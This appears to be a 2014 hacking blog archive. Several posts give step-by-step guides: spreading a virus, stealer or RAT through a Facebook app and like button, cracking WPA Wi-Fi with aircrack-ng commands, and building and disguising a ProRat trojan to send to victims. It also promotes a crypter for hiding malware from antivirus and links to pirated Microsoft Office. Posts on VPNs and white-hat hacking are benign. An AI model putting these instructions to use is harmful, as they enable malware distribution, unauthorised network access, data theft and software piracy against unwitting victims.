Wednesday, April 23, 2014

Hack Facebook using facebook app


Hack Facebook using facebook app



http://storage.conduit.com/MarketPlace/93/ce3/93951332-f9a7-4af7-af02-17ec3d749ce3/Thumbnail/160x160.png

 Requirements:-

  • You must have a webhost like fileave.com, 110Mb.com, etc.
  •  The file you want to spread must be FUD.
  • If not then download Stealth Crypter (100 % FUD) from GOOGLE

 Follow the Given Steps:-

1. We are now going to setup our Facebook app.

2. You will need a Facebook account to register a Facebook app.

3. For That Go To http://www.facebook.com/developers/createapp.php



 4. Now on Further on right Corner you will see a link named as Setup New Application.


 5. Now fill in the name you want for your application Example I Write "GirlFriend".

 6. Now Click on I agree Terms and then Click on Create Application.


 7. Now Fill the Following Details and then click on Save Changes. 



8. Now click on 'Facebook Integration'.


9. On this page the only thing you need to fill in is the 'Canvas Page'.

10. This allows you to use a Facebook URL for your like button.

11. Fill it in with a name regarding your Facebook page, it can't already be taken For Example I write:  ‘lovegirlfriends’.

12. Then click save changes.



  13. Now Create Your Like Button.
14. Now further going to create a like button to help spread Your App,Go to this link:    http://developers.facebook.com/docs/reference/plugins/like


 15. The only bit you need to fill in is the URL of the page about the canvas so it will be 'http://apps.facebook.com/lovegirlfriends/'


16. Now Further Click on 'Get Code' and copy the IFRAME code to notepad or something so you can use it later.





17. Now Next Step is editing your 'index.html'. We now need to edit our html file so open it in anything that you can edit it with, notepad if you have to.



  18. At this stage you must have your file that you want to spread uploaded to your web host, it cannot be a site such as megaupload it must be a direct link ending in “.exe”.


19. Now upload your Virus/Stealer/Rat in any Webhost

20. The better webhost for server is fileave.com And it will generate the link look like:-'http://apajrlab.fileave.com/apajr.exe'


 21. Now open index.html File and it will look like:- Look for Code:value="ENTER THE URL FOR YOUR VIRUS"

22. Change that to the direct link for your file you want to spread.



 23. Next look for Code:'REPLACE THIS TEXT WITH YOUR FB LIKE BUTTON'  

24. Obviously replace this with the iframe code you just got for your like button.

 25. Upload Your Files on your webhost I follow fileave.com or 110Mb.com
26. This is the easy part; now just upload your three files to your web host.
27. First create a Directory named as Facebook and then upload the three files.




 28. Editing Your App


a. Now we need to edit your app to display the content of the files you just uploaded.

b. Now get us back to allow us to edit the canvas settings.

c. Navigate to the page we were on before and Now we’re going to fill in the canvas URL, Fill it in with the URL where the files are, it must end with a '/'. I recommended uploading your files to a sub directory. E.g. 'http://apajrlab.fileave.com/Facebook/'


 29. Click save settings.


NOTE: - IF FILEAVE.COM displays Error then use this Step
If u have got any Error look like Run time Error or your Canvas URL not Saved then better solution is to upload your Files on other Host like 000webhost.com

  Note: Don't create a Sub-Directory:


It looks like this:
 30. If u have till got Error then goto tinyurl.com or Forward your URL to any Websiteand then write that link on Canvas Url.


31. Now Next Step is testing, To test it, try opening a new browser and visiting your app:'http://apps.facebook.com/lovegirlfriends/'

   You should see something like:






 32. Click run and your file with download and execute.

33. Click the like button for it to show up on your friend’s news feeds and start spreading. (Note: Victims must have java)




Tuesday, April 22, 2014

Download windows 8 transformer for free

Download windows 8 transformer for free













Windows 8 Transformation Pack give you the look and feel of Windows 8 on older
Windows versions. The Metro design, themes, wallpapers, icons, sounds and other features can all be yours with this excellent free theme pack.

Features

Windows 8 Transformation Pack automatically installs several design changes and programs. The freeware comes with an imitation of the new Modern style and adjusts menus, cursors, screensavers and system sounds to emulate Windows' 8th version. You can also configure individual elements of Windows 8 Transformation Pack via the wizard.

Usability

Windows 8 Transformation Pack adds pizazz with its own Modern apps. By clicking on the tile store, you can manage programs and play mini updates or add extra apps. Standard elements include apps like Clock, Calendar, system settings, Gmail, Hotmail, Twitter, Facebook, Internet Explorer, Music and Photo Gallery.

Quality


Windows 8 Transformation Pack is a worthy successor to the popular Seven Transformation Pack. This early version of Windows 8 is a pretty impressive mimic. If Seven Translation Pack is anything to go by, as Windows 8 gets more advanced, so too will Windows 8 Transformation Pack, so keep an eye out for even more updates.


http://adfoc.us/22615842115750


Download microsoft 2013 fullversion for free

Download Microsoft 2013 full version for free





Office 2013 is Microsoft's desktop and cloud productivity suite. It's available as a stand alone desktop package or through Microsoft's Office 365 subscription model. It's various versions include the programs:
  •     Word 2013
  •     Excel 2013
  •     PowerPoint 2013
  •     Outlook 2013
  •     Access 2013
  •     OneNote 2013
  •     Project 2013
  •     Publisher 2013
  •     Visio 2013

The first thing you'll notice when starting Microsoft Office 2013 is it's clean, refreshing and coherent look across all supported platforms including desktop, smartphones and tablets. Through a subscription of Office 365 and the integration with SkyDrive you can access and edit your files from any computer via a browser.
Among the new features are a "Read Mode" in Word 2013 which removes toolbars and lets you swipe and tab through a document like in an "E-Reader". Videos are better supported. They can be searched, added and viewed directly within Word. Excel 2013 has new easy ways of working with formulas and charts in spreadsheets. Powerpoint 2013 was enhanced with better controls while in presentation mode, for example "Slide Zoom" to zoom in on a section of your slide. Adding photos to a presentation also became easier as you can now search and add pictures from your albums on Flickr and other online photo and social network sites.


http://www.mediafire.com/view/tdcbidro9ijttjd/M.Office_Professional_Plus_2013_FULL_VERSION_Latest


Sunday, April 20, 2014

Download Aegis crypter fullversion for free

Download Aegis crypter full version for free












 Aegis Crypter can be used to encrypt viruses,RAT,keyloggers,spywares etc to make them undetectable from antiviruses.When these exe files are encrypted with Fud crypters they become undetectable with antiviruses.This tool is best for hacking, using this we can encrypt any file which cannot be recoganised by any antivirus.
Download and enjoy


http://adfoc.us/22615842014909

Friday, April 18, 2014

Hack wifi using backtrack (O.S)


Hack wifi using backtrack (O.S)

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjehAu9NPf5QuhCLMfjSYVnvQLy9BgeCa4-8FraLjWJuxqEIR_0dZRGP-k7Rrj2Cm_KMT32fyM6tEfID_nCHRpJLuh8n-F8dky49Z2u-ZQhw58tgr5TYF55quujov6RXjHH2FziAt-rMQs0/s1600/Backtrack.png


Step1 : Open a new terminal and type if config     
 
Step 2 : Now we are going to down the server and pass our mac addresses.  To do so enter 
ifconfig wlan0 down.
 
Step 3 : Now pass the mac addresses by using the command -m 00:11:22:33:44:55 wlan0
   
     
Step 4 : Now we are going to start hacking the wifi.  Remember wep is less secured than wpa. Now enter  airmon-ng start wlan0       

                                                                        
Step 5 : Now we can see that monitor mode is enabled. Now to scan for wireless network enter  the command airodump-ng mon0
Step 6: When you enter this command a screen will scan all the wirelesses network . When you find your wifi which you want to hack press ctrl+c to stop scan.  Now copy the bssid of the required wifi.





Step 7 : Now we are going to pass the data to do so enter the command remember you must give your bssid and channel airdump-ng  --bssid 00:23:69:98:AC:05 -c 4 hackwpa mon0


Step 8: Now a page will appear which will send and receive data .  Wait till the limited data is send and recivied .


Step 9:  Dont close the above terminal. Now open a new terminal and enter the command which is to get replay  aireplay-ng  -0 30 -a 00:23:69:98:AC:05 mon0



Step 10 : Now open that terminal which was sending and reciving data . wpa handshake  will be created.


Step 11:  Now open a new terminal and here iam using wordlist if dont have wordlist you can use brutforce and rainbow attack also.Heare Iam using dictionary attack, enter the command to hack
aircrack-ng -w wordlist -b 00:23:69:98:AC:05 hackwpa*.cap

Step 12 : Now you have hacked wifi.





 

How to use prorat

How to use prorat full tutorial




Step 1 : . Download ProRat. Once it is downloaded right click on the folder and choose to extract it.
 make sure that the antivirus is disabaled.

Step 2 :     Open up the program. You should see the following:

 Step 3 : Next we will create the actual Trojan file. So click on Create and choose Create ProRat Server.



Step 4 :Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to insert your ip  automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.

Step 5 :   Click on the General Settings button to continue. Here we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and can also connect with them, and give victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.


Step 6 :  Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. In the example I will use an ordinary text document.





Step 7 :  .Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I will stick with the default because it has icon support, but exe’s looks suspicious so it would be smart to change it.



Step 8:   Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.



Step 9 :  Finally click on Create Server to, to create the server file.

Step 10:  A hacker would probably rename it to something like “Funny Joke” and send it as an attachment to some people. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.

Step 11 :   Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.

Step 12 :   I’m going to run the server on my own computer to show you what would happen. Once I run it the trojan will be installed onto my computer in the background. The hacker would then get a message telling him that I was infected. He would then connect to my computer by typing in my IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to my computer and have full control over it.


Step 13 :     Now the hacker has a lot of options to choose from as you can see on the right. He has access to all my computer files, he can shut down my pc, get all the saved passwords off my computer, send a message to my computer, format my whole hard drive, take a screen shot of my computer, and so much more. Below I’ll show you a few examples.




Step 14 : The image below shows the message I would get on my screen if the hacker chose to message me.



Step 15 :    Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.





http://adfoc.us/22615841971202


Thursday, April 17, 2014

Download Rar password recovery magic

Download Rar password recovery magic



RAR Password Recovery Magic is a powerful tool designed to recover lost or forgotten passwords for a RAR/WinRAR archives. RAR Password Recovery Magic supports the customizable brute-force and dictionary-based attacks.

RAR Password Recovery Magic has an easy to use interface. All you need to do to recover your password is just to add your file to the operation window.


Key Features:

Recover passwords for RAR/WinRAR archives.
Custom character set for "brute-force" attack supported.
You can select character from a range of character options including: Letters, Numbers, symbol...
Large wordlist dictionary.
Work in the background.
Features a user-friendly interface.


How to Use:

RAR Password Recovery Magic is very easy to use. To recover a password, all you need to do is just to add your file to the operation window.
Step 1: Click "Open" button to open rar archive.

Step 2: Click "Setting" button to set desired parameters.

A - The set of characters available in the password. (letters only, numbers only, symbol only, letters and numbers...)
B - Select the password length (range) in "BruteForce" panel.
Step 3: Press the "Start" button to start recovery.


Minimum System Requirements:

Microsoft Windows 2000/XP/2003/vista
Intel or AMD or compatible processors at 1000 MHz minimum
RAM 128 megabytes (MB)
Minimum 700 MB of free hard disk space


~ INSTALL NOTES ~

* Install the application.
* Register the application with Serial Key.
* Enjoy...

You may also like : Acunetix paid version download

http://adfoc.us/22615841970974

Know about whitehat for free

Know about whitehat for free

http://eatmywords.com/eatmywords/wp-content/uploads/2012/03/whitehat.jpg

The term "white hat" in Internet slang refers to an ethical computer hacker, or a computer security expert, who specializes in penetration testing and in other testing methodologies to ensure the security of an organization's information systems. Ethical hacking is a term coined by IBM meant to imply a broader category than just penetration testing. White-hat hackers may also work in teams called "sneakers", red teams, or tiger teams. White hat hackers tend to stick to a contract authorized by solicitors which is signed by the hacker and the third party in order to cover the hackers back.
While penetration testing concentrates on attacking software and computer systems from the start – scanning ports, examining known defects and patch installations, for example – ethical hacking, which will likely include such things, is under no such limitations. A full blown ethical hack might include emailing staff to ask for password details, rummaging through executive’s dustbins or even breaking and entering – all, of course, with the knowledge and consent of the targets. To try to replicate some of the destructive techniques a real attack might employ, ethical hackers arrange for cloned test systems, or organize a hack late at night while systems are less critical.
Some other methods of carrying out these include:

  •     DoS attacks
  •     Social engineering tactics
  •     Security scanners such as:
  •         W3af
  •         Nessus
  •         Nexpose
  •     Frameworks such as:
  •         Metasploit

Such methods identify and exploit known vulnerabilities, and attempt to evade security to gain entry into secured areas.

http://adfoc.us/22615841926927

Download Hotspot shield vpn

Download Hotspot shield to change your ip

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpo1E8FtNKwmUVd39Cdl1scsizr6nxWgTpfJe8btghibUV9ARq-e-roLQSRr_-S-J_ALfUIv7Wwg9Dlyg46Znie6AqK6tMWhy7iMrACOL7z8cqz1RjKalvCAMLQmzszbc2BVNF55qvZqg/s1600/hotpost+shield.jpg



Hotspot Shield is a free tool and service that lets you connect to the Internet via Virtual Private Network (VPN). Hotspot Shield is mainly geared toward those who want a more secure connection when accessing the Internet from public Wi-Fi hotspots.

Pros

Value: Hotspot Shield is one of the largest free VPN services in the world. Though the free version is ad-supported, the paid Elite tier comes at an affordable price, with cross-platform support.

Customizable: Hotspot Shield allows you to connect from other countries. This not only helps to shield your connection origins, but it also potentially lets you access content that's available only from certain global regions.

Control: Hotspot Shield's dashboard gives you an overview of the protection status and data speeds for both uploads and downloads, allowing you to monitor your connection performance.

Cons

Ad disruptive: Hotspot Shield Free occasionally shows up as a pop-up or header on the top of your browser. While this window may be closed, it does become rather tedious to have to close it every time.

Limited connection: The free version does not allow you to connect from other locations or regions.

Bottom Line

Hotspot Shield is a lightweight VPN solution that we recommend for anyone who's even slightly concerned about privacy. The free version may be riddled with a few ads, but it's a service that's worth the price, especially if you find yourself frequently accessing the Internet from public places. Hotspot Shield is a valuable service and remains competitive with other premium VPN services.

You may also like : RAR Password recovery 

http://adfoc.us/22615841923045